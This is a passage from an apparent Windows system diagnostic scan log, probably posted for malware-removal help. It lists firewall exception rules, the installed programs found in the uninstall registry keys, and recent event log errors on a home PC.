"{CB2134DD-F8C3-443E-9E35-E89D69EBCF07}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version7\teamviewer.exe | 
"{CD61B1E2-9488-4D1E-A542-A55F796B068B}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\scoregasm demo\scoregasm demo.exe | 
"{CDCBE4BE-08BB-473D-AA09-C53EB8822856}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\ai war fleet command\aiwar.exe | 
"{D2D404F4-661A-4E89-846B-88FED6B61C34}" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.patch.exe | 
"{D9589A89-9248-442E-8633-058F9634F51D}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 | 
"{D9A81F63-FEB7-46B1-B2EC-54A26513AA69}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\vertex dispenser demo\vertex dispenser demo.exe | 
"{E0B0D3D7-D578-486D-9D5F-36F8429E389D}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgm.exe | 
"{E1075E87-BA23-47FA-B27E-8BB003342A9E}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\audiosurf\engine\questviewer.exe | 
"{E20F36F7-439A-4C78-9364-AEB5063A4BC9}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\acbsp.exe | 
"{E268F21D-4A59-4533-9E50-F184AA9AF835}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqste08.exe | 
"{E2A9947C-FD6B-4261-A2C4-0437A0166676}" = dir=out | app=c:\program files\lenovo\readycomm\projectionist.exe | 
"{E3C6181F-97B8-4841-826F-B8FAACCEC287}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{E4479B4A-5BC8-4CB8-BBE1-6DFF4558294E}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\criticalmassdemo\criticalmassdemo.exe | 
"{E5EC9098-A940-4C7B-B034-F170B0DCA11A}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_dx9.exe | 
"{EB39426F-6ACA-4BA5-A482-CF3BB50138B1}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{EBFDDEA3-1E09-4672-9556-275367F5FECD}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe | 
"{EC8FC484-D7E6-41A2-9B36-1C2E9DEA4B32}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\amnesia the dark descent demo\launcher.exe | 
"{EDD8DB06-8993-45DC-B848-3835F0C23485}" = dir=in | app=c:\program files (x86)\lenovo\readycomm\common\igrs.exe | 
"{EE4888A5-9B98-4F3A-966A-613DF16B0231}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\limbo\limbo_demo.exe | 
"{EEF2DA62-A6CD-4FE9-8E6F-C5D6763B4C9F}" = dir=in | app=c:\program files (x86)\lenovo\readycomm\common\igrs.exe | 
"{EF606D42-29A2-44B4-B648-BFA5F1DF7F40}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\amnesia the dark descent demo\launcher.exe | 
"{F24B2693-82A1-4CC2-AD97-DF1803BA2F12}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version7\teamviewer_service.exe | 
"{F2883B47-1A5B-4AAF-90E1-B17CEE848211}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead\left4dead.exe | 
"{F2F7B2B5-A4B7-4A93-B47D-96FC882C3684}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\limbo\limbo_demo.exe | 
"{F43E81AC-FA94-476B-B59B-6913F0403A88}" = dir=in | app=c:\program files\lenovo\readycomm\readycom.exe | 
"{F959B1B6-BA6D-4749-8C39-C84FABA37179}" = dir=out | app=c:\program files\lenovo\readycomm\connsvc.exe | 
"{FA341DAC-912F-4B13-8BBE-0058412D981A}" = dir=in | app=c:\program files (x86)\windows live\sync\windowslivesync.exe | 
"{FA6170D6-4F50-4052-9AEA-FE0C3577105B}" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.exe | 
"{FD63EB92-A846-44EC-8ACE-FD4A002DD07D}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 | 
"TCP Query User{4FABC994-8176-4114-B6B7-D3F32C1BE14C}C:\program files (x86)\oovoo\oovoo.exe" = protocol=6 | dir=in | app=c:\program files (x86)\oovoo\oovoo.exe | 
"TCP Query User{AFFA34FA-18B9-45A0-8CBD-0E3D198C303F}C:\program files (x86)\world of warcraft\backgrounddownloader.exe" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\backgrounddownloader.exe | 
"TCP Query User{BAA4944F-E0CF-43A2-B3EF-C3F238DD3B06}C:\program files (x86)\oovoo\oovoo.exe" = protocol=6 | dir=in | app=c:\program files (x86)\oovoo\oovoo.exe | 
"TCP Query User{C34EEBE5-0134-4D41-8CF4-98D9282D3AFF}C:\program files (x86)\world of warcraft\temp\wow-4.2.1.2683-enus-tools-downloader.exe" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\temp\wow-4.2.1.2683-enus-tools-downloader.exe | 
"TCP Query User{C9FAD066-8BE9-4214-9807-38C946C20323}C:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe" = protocol=6 | dir=in | app=c:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe | 
"TCP Query User{E7402588-C407-4C53-A3CE-5314937EA790}C:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe | 
"UDP Query User{550C8138-D21D-4B10-9637-593CCCB6FB9F}C:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe" = protocol=17 | dir=in | app=c:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe | 
"UDP Query User{7FB18A94-3999-4EB1-9970-671E1A40E777}C:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe | 
"UDP Query User{93EFC8AE-60A4-4023-B04C-60091B641C89}C:\program files (x86)\oovoo\oovoo.exe" = protocol=17 | dir=in | app=c:\program files (x86)\oovoo\oovoo.exe | 
"UDP Query User{BCFF5739-DB6D-4B73-BA78-9920BE772983}C:\program files (x86)\world of warcraft\backgrounddownloader.exe" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\backgrounddownloader.exe | 
"UDP Query User{D8A02302-1565-4360-AC90-82FBA717D184}C:\program files (x86)\oovoo\oovoo.exe" = protocol=17 | dir=in | app=c:\program files (x86)\oovoo\oovoo.exe | 
"UDP Query User{E0ED478D-4FD3-4939-B1CF-4FC8B3AF679D}C:\program files (x86)\world of warcraft\temp\wow-4.2.1.2683-enus-tools-downloader.exe" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\temp\wow-4.2.1.2683-enus-tools-downloader.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}" = HP Deskjet F4500 All-in-One Driver Software 14.0 Rel. 6
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1E9FC118-651D-4934-97BE-E53CAE5C7D45}" = Microsoft_VC80_MFCLOC_x86_x64
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}" = Apple Mobile Device Support
"{37D0157F-45C6-4DB2-9AE5-489DD98CE169}" = iTunes
"{4569AD91-47F4-4D9E-8FC9-717EC32D7AE1}" = Microsoft_VC80_CRT_x86_x64
"{46F4D124-20E5-4D12-BE52-EC177A7A4B42}" = Lenovo OneKey Recovery
"{48C0866E-57EB-444C-8371-8E4321066BC3}" = Network64
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{53EE2829-E9DB-4913-B3EA-96F10F84E98B}" = Melodyne Runtime 4.1 (x64)
"{5DEFFC02-063C-4781-A371-077729F869B4}" = Lenovo Solution Center
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1" = Revo Uninstaller Pro 2.5.8
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{8338783A-0968-3B85-AFC7-BAAE0A63DC50}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
"{8557397C-A42D-486F-97B3-A2CBC2372593}" = Microsoft_VC90_ATL_x86_x64
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010
"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010
"{90140000-006D-0409-1000-0000000FF1CE}" = Microsoft Office Click-to-Run 2010
"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
"{925D058B-564A-443A-B4B2-7E90C6432E55}" = Microsoft_VC80_ATL_x86_x64
"{92A3CA0D-55CD-4C5D-BA95-5C2600C20F26}" = Microsoft_VC90_CRT_x86_x64
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9D00A8DA-650F-21C6-E787-78756733F15F}" = ATI Catalyst Install Manager
"{A472B9E4-0AFF-4F7B-B25D-F64F8E928AAB}" = Microsoft_VC90_MFC_x86_x64
"{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}" = Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B6E3757B-5E77-3915-866A-CCFC4B8D194C}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053
"{BE930E38-7BB3-45B6-85B2-5251F374F844}" = 64 Bit HP CIO Components Installer
"{C8C1BAD5-54E6-4146-AD07-3A8AD36569C3}" = Microsoft_VC80_MFC_x86_x64
"{CFF4500E-C5D6-695D-A027-B3D4DDED2CC3}" = McAfee Online Backup
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{EF79C448-6946-4D71-8134-03407888C054}" = Shared C Run-time for x64
"{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}" = Microsoft .NET Framework 4 Client Profile
"0A4175B489A1B4A6E07E11B063A6263480C51D71" = Windows Driver Package - Lenovo (ACPIVPC) System  (10/19/2009 5.4.0.1)
"0d849438-e498-4416-ace4-fa9880d0efaa_is1" = Sibelius 7 First 7.1.3.78
"CCleaner" = CCleaner
"CNXT_AUDIO_HDA" = Conexant HD Audio
"Elantech" = ETDWare PS/2-x64 7.0.4.18_WHQL
"HP Imaging Device Functions" = HP Imaging Device Functions 14.0
"HP Smart Web Printing" = HP Smart Web Printing 4.60
"HP Solution Center & Imaging Support Tools" = HP Solution Center 14.0
"HPExtendedCapabilities" = HP Customer Participation Program 14.0
"Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
"Shop for HP Supplies" = Shop for HP Supplies
"WinRAR archiver" = WinRAR 4.20 (64-bit)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{01FB4998-33C4-4431-85ED-079E3EEFE75D}" = CyberLink YouCam
"{033E378E-6AD3-4AD5-BDEB-CBD69B31046C}" = Microsoft_VC90_ATL_x86
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{06A1D88C-E102-4527-AF70-29FFD7AF215A}" = Scan
"{06E6E30D-B498-442F-A943-07DE41D7F785}" = Microsoft Search Enhancement Pack
"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0CE226F3-EB27-4ECD-BBF5-F088716779FD}" = Energy Management
"{1111706F-666A-4037-7777-211328764D10}" = JavaFX 2.1.1
"{1458BB78-1DC5-4BC0-B9A3-2B644F5A8105}" = DeviceDiscovery
"{150B6201-E9E6-4DFB-960E-CCBD53FBDDED}" = HPProductAssistant
"{15FEDA5F-141C-4127-8D7E-B962D1742728}" = Adobe Photoshop CS5
"{16DF894D-FC3F-4B87-908D-671E201CD7A8}" = Melodyne singletrack
"{17542DBF-E17C-4562-BC4D-FA3EF3076C45}" = Lenovo ReadyComm 5
"{196BB40D-1578-3D01-B289-BEFC77A11A1E}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{2376AAB2-F4D9-48D7-A42B-4E80B8967A8B}" = F4500
"{26A24AE4-039D-4CA4-87B4-2F83217007FF}" = Java 7 Update 7
"{27C467F8-F8EF-4f68-BD72-D63632B2096C}" = McAfee Online Backup
"{28ABE740-47F3-441B-9437-852F6A64EFF8}" = Lenovo_Wireless_Driver
"{292F0F52-B62D-4E71-921B-89A682402201}" = Toolbox
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{2A83AD05-56E6-3FBD-8752-B4143162EF59}" = Google Talk Plugin
"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App
"{2FB9EA69-51D4-4913-9AD5-762C034DE811}" = Status
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel® Rapid Storage Technology
"{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"{46F044A5-CE8B-4196-984E-5BD6525E361D}" = Apple Application Support
"{4941E15C-3C68-4FB7-B5A4-5061B92E9166}" = Ableton Live 8
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4A0FF669-F964-404A-980A-1C55D62745AD}" = Microsoft Office Labs Ribbon Hero 2, Clippy's Second Chance
"{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}" = Google Earth Plug-in
"{4BB1DCED-84D3-47F9-B718-5947E904593E}" = Lenovo EasyCamera
"{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}" = Skype™ 6.10
"{52E225FC-FCB4-41F7-837B-6E37FB05BD7B}" = Adobe AIR
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5DCF0E4B-F8EA-4229-A0BD-5CA6D4AFB749}" = SolutionCenter
"{5F189DF5-2D05-472B-9091-84D9848AE48B}{f1f78e38}" = WinSpeed
"{623C2BD8-1B28-4F98-B578-E9D139827269}" = Sibelius 7 OpenType Fonts
"{635FED5B-2C6D-49BE-87E6-7A6FCD22BC5A}" = Microsoft_VC90_MFC_x86
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel® Management Engine Components
"{665DC374-A0C1-48D4-AFCA-011D7AA8963F}" = Human Japanese 2.0
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}" = Windows Media Player Firefox Plugin
"{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-hp" = WildTangent Games App (HP Games)
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{74DC0593-6BC6-4001-AD5F-D810AFB68D86}" = HP Update
"{76C66170-C538-4E77-B54D-48E136B5B533}" = Lenovo ReadyComm 5.0 Service
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{77DCDCE3-2DED-62F3-8154-05E745472D07}" = Acrobat.com
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{82BF2C5E-79A7-4A13-B508-D5E64A5B141E}" = Uninstall Helper
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}" = Windows Live Sync
"{85498904-0748-45AA-9482-6DB8EA971B91}" = DJ_AIO_06_F4500_SW_MIN
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver For Windows Vista and Later
"{888F1505-C2B3-4FDE-835D-36353EBD4754}" = Ubisoft Game Launcher
"{8CFA9151-6404-409A-AF22-4632D04582FD}" = Assassin's Creed
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8EE94FD8-5F52-4463-A340-185D16328158}" = WebReg
"{8FF6F5CA-4E30-4E3B-B951-204CAAA2716A}" = SmartWebPrinting
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{90140011-0066-0409-0000-0000000FF1CE}" = Microsoft Office Starter 2010 - English
"{91140000-0011-0000-0000-0000000FF1CE}" = Microsoft Office Professional Plus 2010
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95140000-0070-0000-0000-0000000FF1CE}" = Microsoft Office 2010
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = Realtek USB 2.0 Card Reader
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE466FF-70B7-4DA8-807C-DB4C3610FDAA}" = Copy
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{9D994879-5A05-2E8A-6D21-321221AFFF32}" = Amazon Music Importer
"{9FFC4E8E-2E8F-4030-A5E4-27EC4A269F32}" = Lenovo Smile Dock
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A78FE97A-C0C8-49CE-89D0-EDD524A17392}" = PDF Settings CS5
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AC35A885-0F8F-4857-B7DA-6E8DFB43E6B3}" = HPSSupply
"{AC76BA86-7AD7-1033-7B44-AA1000000001}" = Adobe Reader X (10.1.8)
"{AC76BA86-7AD7-5760-0000-900000000003}" = Japanese Fonts Support For Adobe Reader 9
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{B2164CCB-C002-4B80-8550-7535D80DF237}" = Lenovo DirectShare
"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Click to Call
"{B92C5909-1D37-4C51-8397-A28BB28E5DC3}" = Facebook Video Calling 1.2.0.287
"{BB3447F6-9553-4AA9-960E-0DB5310C5779}" = GPBaseService2
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BDFD2A7B-E607-4092-A77C-74FA75B484F8}" = Ableton Live 9 Trial
"{BE4BA698-8533-4F77-9559-C7F3F78C0B05}" = Assassin's Creed Brotherhood
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{CAE4213F-F797-439D-BD9E-79B71D115BE3}" = HPPhotoGadget
"{CD31E63D-47FD-491C-8117-CF201D0AFAB5}" = TrayApp
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{CF3D856D-6E97-4B29-A515-F2205A43DF8D}" = Ableton Live 9 Lite
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D1A19B02-817E-4296-A45B-07853FD74D57}" = Microsoft_VC80_MFC_x86
"{D360FA88-17C8-4F14-B67F-13AAF9607B12}" = MarketResearch
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}" = Microsoft XNA Framework Redistributable 4.0 Refresh
"{D92BBB52-82FF-42ED-8A3C-4E062F944AB7}" = Microsoft_VC80_MFCLOC_x86
"{DAE9A7CF-8619-482A-82CA-6D7F5D400239}" = ArtRage Studio
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{DFB19121-0609-49C1-92B1-546E5A940FE8}" = Onekey Theater
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E50FC5DB-7CBD-407D-A46E-0C13E45BC386}" = Oasis2Service 1.0
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel® Graphics Media Accelerator Driver
"{F187D064-F101-4E95-8D05-4027809AA0F8}" = Avid License Control
"{F8A9085D-4C7A-41a9-8A77-C8998A96C421}" = Intel® Control Center
"{FA0FF682-CC70-4C57-93CD-E276F3E7537E}" = BufferChm
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 11 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.5
"Audacity_is1" = Audacity 2.0.5
"Audiosurf_is1" = Audiosurf Beta
"com.amazon.music.uploader" = Amazon Music Importer
"ConverterLite" = ConverterLite 1.5.1
"ESET Online Scanner" = ESET Online Scanner v3
"HP Photo Creations" = HP Photo Creations
"InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}" = CyberLink YouCam
"InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}" = Lenovo OneKey Recovery
"InstallShield_{B2164CCB-C002-4B80-8550-7535D80DF237}" = Lenovo DirectShare
"Lenovo Smile Dock" = Lenovo Smile Dock
"Live 8.0.9" = Live 8.0.9
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"McAfee Virtual Technician" = McAfee Virtual Technician
"McPixel_is1" = McPixel version 1.0.4
"Mozilla Firefox 13.0 (x86 en-US)" = Mozilla Firefox 13.0 (x86 en-US)
"Mozilla Firefox 26.0 (x86 en-US)" = Mozilla Firefox 26.0 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"MSC" = McAfee Total Protection
"MuseScore" = MuseScore 1.3
"Office14.Click2Run" = Microsoft Office Click-to-Run 2010
"Office14.PROPLUSR" = Microsoft Office Professional Plus 2010
"OpenAL" = OpenAL
"PunkBusterSvc" = PunkBuster Services
"Revo Uninstaller" = Revo Uninstaller 1.94
"Steam App 102410" = Vertex Dispenser Demo
"Steam App 105310" = Critical Mass Demo
"Steam App 12910" = Audiosurf Demo
"Steam App 206650" = Scoregasm Demo
"Steam App 340" = Half-Life 2: Lost Coast
"Steam App 400" = Portal
"Steam App 40410" = AI War: Fleet Command - Demo
"Steam App 440" = Team Fortress 2
"Steam App 48010" = LIMBO Demo
"Steam App 57310" = Amnesia: The Dark Descent Demo 
"Steam App 58410" = Turba Demo
"Steam App 620" = Portal 2
"TeamViewer 7" = TeamViewer 7
"Uninstall Helper 2.0.1.0" = Uninstall Helper
"VeriFace" = VeriFace
"WildTangent hp Master Uninstall" = HP Games
"WinLiveSuite" = Windows Live Essentials
"WinPcapInst" = WinPcap 4.1.2
"WTA-42efb11f-838a-40cb-92e3-8eb07758d93e" = Polar Bowler
"WTA-a1c2d00f-1018-4736-849f-798edef81104" = Insaniquarium Deluxe
"Yahoo! Messenger" = Yahoo! Messenger
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1" = ChromecastApp
"Amazon Amazon Cloud Player" = Amazon Cloud Player
"Dropbox" = Dropbox
"Google Chrome" = Google Chrome
"UnityWebPlayer" = Unity Web Player
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 1/3/2014 1:29:06 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 491310
 
Error - 1/3/2014 1:29:06 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 491310
 
Error - 1/3/2014 2:28:18 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 1/3/2014 2:28:18 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 1092
 
Error - 1/3/2014 2:28:18 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 1092
 
Error - 1/3/2014 2:28:19 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
 
Error - 1/3/2014 2:28:19 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 2325
 
Error - 1/3/2014 2:28:19 AM | Computer Name = Bri | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 2325
 
Error - 1/4/2014 2:29:23 AM | Computer Name = Bri | Source = VSS | ID = 8194
Description = 
 
Error - 1/4/2014 4:14:33 PM | Computer Name = Bri | Source = VSS | ID = 8194
Description = 
 
Error - 1/4/2014 4:37:27 PM | Computer Name = Bri | Source = Application Hang | ID = 1002
Description = The program Skype.exe version 6.10.0.104 stopped interacting with 
Windows and was closed. To see if more information about the problem is available,
 check the problem history in the Action Center control panel.    Process ID: d88    Start
 Time: 01cf0988ec17d0d9    Termination Time: 62    Application Path: C:\Program Files (x86)\Skype\Phone\Skype.exe
 
Report
 Id:   
 
[ Media Center Events ]
Error - 12/22/2010 5:45:31 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 1:45:30 AM - Error connecting to the internet.  1:45:31 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 5:45:41 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
Description = 1:45:36 AM - Error connecting to the internet.  1:45:36 AM -     Unable
 to contact server..  
 
Error - 12/22/2010 6:45:47 AM | Computer Name = Bri-PC | Source = MCUpdate | ID = 0
